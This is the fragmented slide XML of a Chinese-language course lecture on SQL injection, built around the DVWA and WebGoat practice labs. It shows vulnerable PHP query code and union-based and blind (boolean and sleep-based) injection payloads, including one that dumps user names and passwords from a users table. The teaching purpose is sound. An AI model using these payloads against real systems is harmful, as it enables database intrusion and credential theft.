        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="20326"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1215327" y="20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25754" y="2335594"/>
        <a:ext cx="60766" cy="60766"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BD4FEF7F-3FDD-4AC6-AF35-5C4D32ABAEAE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2597278" y="2538720"/>
          <a:ext cx="1705705" cy="660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USER</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2616616" y="2558058"/>
        <a:ext cx="1667029" cy="621576"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E16D0ECE-6646-4E8E-A6C1-8CD80239E06E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4302983" y="2848520"/>
          <a:ext cx="682282" cy="40653"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="20326"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="682282" y="20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27067" y="2851789"/>
        <a:ext cx="34114" cy="34114"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{212DDA27-8250-49F3-80A4-007C0678F042}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4985265" y="1964797"/>
          <a:ext cx="1705705" cy="18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Host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User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Password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多个权限字段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安全字段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资源控制字段</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5035223" y="2014755"/>
        <a:ext cx="1605789" cy="1708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3118E-FD59-4C6C-8208-4B19406086A4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="502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</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="32386" y="2112929"/>
        <a:ext cx="1502386" cy="879540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{87AC88B6-8A25-4CDB-A5B1-4A5597E4AC9A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="171784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717848" y="2436850"/>
        <a:ext cx="231076" cy="231698"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FF02C4F4-61B5-4763-8F0E-3C3B83298318}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="218498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服务器接收请求</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2212346" y="2112929"/>
        <a:ext cx="1502386" cy="879540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0E59D071-3D1F-4775-B261-DED7DD0E3995}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="389780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897808" y="2436850"/>
        <a:ext cx="231076" cy="231698"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3B454A85-3FC5-46BA-AAD6-733C1FDF4A21}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="436494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拼接</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2300" kern="1200" dirty="0"/>
            <a:t>SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2300" kern="1200" dirty="0"/>
            <a:t>语句</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4392306" y="2112929"/>
        <a:ext cx="1502386" cy="879540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4455981C-5A36-4755-8675-D715979889BB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="607776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077768" y="2436850"/>
        <a:ext cx="231076" cy="231698"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCF3412A-AB92-49B6-8A3A-4EC5AC6BFDDC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="654490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数据库查询</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6572266" y="2112929"/>
        <a:ext cx="1502386" cy="879540"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3F78D5EE-54EA-46DD-BC8E-F6988730E29C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8257728" y="2359617"/>
          <a:ext cx="330108" cy="38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8257728" y="2436850"/>
        <a:ext cx="231076" cy="231698"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{42DA8F42-25C0-4654-B3B6-F4044BAF7032}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8724862" y="2085565"/>
          <a:ext cx="1557114" cy="93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</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8752226" y="2112929"/>
        <a:ext cx="1502386" cy="879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我们所有见到的跟日常生活有关、需要记录的基本全部放在数据库里面：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身份证信息放在公安部的系统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银行卡的余额和交易记录、转帐信息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在酒店的入住信息（所有出现了某些方面的数据库被盗和信息泄漏）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飞机、火车、汽车联网购票记录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各个不同的网站、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、网上购物、贴吧、喜欢听的音乐、电影的收藏信息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手机电话机录、余额、公交卡余额、水费、电费、彩票的购买记录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打游戏的装备、等级、魔力、力量、攻击能力等信息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美国航空母舰也在使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库在管理航母的相关信息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40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ym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例子：CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> TABLE employees(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> varchar(6) not null primary key,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> varchar(20),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> varchar(20),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    department varchar(20),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    salary varchar(10),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>auth_tan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> varchar(6)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>该语句创建了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>先前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>给出的员工示例表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:sym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58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1’ order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="1200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by 2 #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DVWA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只选择了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first name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last name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，所以只要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列</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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1' and 1=2 union select user(),database() --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57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CONCAT_WS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（）。使用语法为：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CONCAT_WS(separator,str1,str2,…)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CONCAT_WS()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CONCAT With Separator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CONCAT()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的特殊形式。第一个参数是其它参数的分隔符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char(32)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代表一个空格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" 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char(58)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代表一个冒号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":“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>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1' union select null,concat_ws(char(32,58,32), user, password) from users #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71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https://blog.csdn.net/qq_45070118/article/details/98634297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45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注意：单引号一定是半角符号，最好手动输入，不要复制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50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一般用折半法查询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1’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ascii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substr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(database(),1,1))&lt;110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也正确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缩减范围，最后确定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100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1’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ascii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substr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(database(),1,1))=100 #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说明第一位为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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN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第二位就把起始位改为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，和第一个一样的方法最后确定为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1’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ascii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substr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(database(),3,1))=119 #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第三位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1’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ascii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substr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(database(),3,1))=119 #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第四位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1’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ascii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substr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(database(),4,1))=97 #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最终数据库名称为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dvwa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猜解数据中的表名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12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猜解表的名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第一位</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1’ and if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ascii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=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’ limit 0,1),1))&gt;97,sleep(5),1)#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1’ and if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ascii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=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’ limit 0,1),1))&lt;112,sleep(5),1)#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第二位</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1’ and if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ascii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=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’ limit 0,1),1))&lt;112,sleep(5),2)#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>然后慢慢试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>两个表为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>guestbook,users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猜解表中有几个字段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1’ and if((select count(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)from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=‘users’)=8,sleep(5),1) #</a:t>
            </a:r>
          </a:p>
          <a:p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猜解字段的长度</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1’ and if(length(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=’users’ limit 0,1),1))=7,sleep(5),1)#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猜解字段的名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1’ and if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ascii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=‘users’ limit 0,1),1))&gt;97,sleep(5),1)#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49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64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9878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2004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17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.csdn.net/so/search?q=%E5%AD%97%E7%AC%A6%E4%B8%B2&amp;spm=1001.2101.3001.7020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qlmap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第五讲 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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SQL</a:t>
            </a:r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注入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854" y="1124613"/>
            <a:ext cx="10472145" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包含员工数据的示例 SQL 表；表的名称是 'employees':</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>一家公司在其数据库中保存的以下员工信息：唯一的员工编号（'userid'）、姓氏、名字、部门、工资和交易验证号（'auth_tan'）。每条信息都存储在单独的列中，每一行代表公司的一名员工。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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 descr="]A_N8Y3YHCRAA2CK2YM))Z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2800"/>
            <a:ext cx="732591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测试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A1-&gt;SQL Injection(intro) -&gt; 2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尝试检索员工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Bob Franco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的部门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请注意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你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在此任务中已被授予完全管理员权限，无需身份验证即可访问所有数据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测试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A1-&gt;SQL Injection(intro) -&gt; 3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尝试将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Tobi Barnett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的部门更改为“Sales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6" y="4495800"/>
            <a:ext cx="10868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数据定义语言 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(DDL)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数据定义语言包括用于定义数据结构的命令。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DDL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令通常用于定义数据库的模式，包括表、索引、视图、关系、触发器等对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DDL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令用于创建、修改和删除数据库对象的结构。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CREATE - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>创建数据库对象，例如表和视图</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ALTER - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>改变现有数据库的结构</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DROP - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>从数据库中删除对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果攻击者成功地将 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DDL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令“注入”到数据库中，他就可以破坏系统的完整性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ALTER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DROP 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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和可用性（使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DROP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句）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0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TABLE employees(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varchar(6) not null primary key,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varchar(20),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varchar(20),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department varchar(20),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salary varchar(10),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auth_tan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varchar(6)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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>该语句创建了先前给出的员工示例表。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3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测试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A1-&gt;SQL Injection(intro) -&gt; 4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现在尝试通过将列“phone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”(varchar(20))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添加到表“employees”来修改模式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81400"/>
            <a:ext cx="6286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数据控制语言 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(DCL)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数据控制语言用于在数据库中实现访问控制逻辑。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DCL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可用于撤销和授予用户对数据库对象（如表、视图和函数）的权限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DCL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令用于实现对数据库对象的访问控制。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GRANT - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>授予用户对数据库对象的访问权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>REVOKE - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>撤销之前使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GRANT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>授予的用户权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果攻击者成功地将 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DCL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令“注入”到数据库中，他就可以破坏系统的机密性（使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GRANT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令）和可用性（使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>REVOKE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令）。例如，攻击者可以授予自己数据库的管理员权限或撤销真正管理员的权限。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02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测试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A1-&gt;SQL Injection(intro) -&gt; 5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尝试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更改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用户组“UnauthorizedUser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表的权限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（查询、删除）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581400"/>
            <a:ext cx="5219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网站数据库查询过程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179490"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="914400" y="1219200"/>
          <a:ext cx="10287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09800" y="4343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发送请求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8404" y="4343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业务功能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81906" y="4343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896" y="4331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6054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注入漏洞是怎么产生的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程序开发过程中动态拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句时，未对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句和关键字进行过滤。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88" y="1844675"/>
            <a:ext cx="4968611" cy="46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DVWA SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(Low)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 页面源代码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   // Get input</a:t>
            </a:r>
            <a:b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$id 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 $_REQUEST[ 'id' ];</a:t>
            </a:r>
            <a:b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   // Check database</a:t>
            </a:r>
            <a:b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   $query  = "SELECT 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FROM users WHERE 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'$id'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;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:b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   $result = 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mysqli_query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($GLOBALS["___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mysqli_ston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"],  $query ) or die( '&lt;pre&gt;' . ((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is_object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($GLOBALS["___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mysqli_ston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"])) ? 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mysqli_error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($GLOBALS["___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mysqli_ston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"]) : (($___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mysqli_res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mysqli_connect_error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()) ? $___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mysqli_res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 : false)) . '&lt;/pre&gt;' );</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" b="0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9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注入攻击的原理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注入攻击的分类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回显注入攻击的流程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盲注攻击的流程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常见防护手段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43657"/>
            <a:ext cx="3733800" cy="4810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7637"/>
            <a:ext cx="3705225" cy="425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19200" y="5507019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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
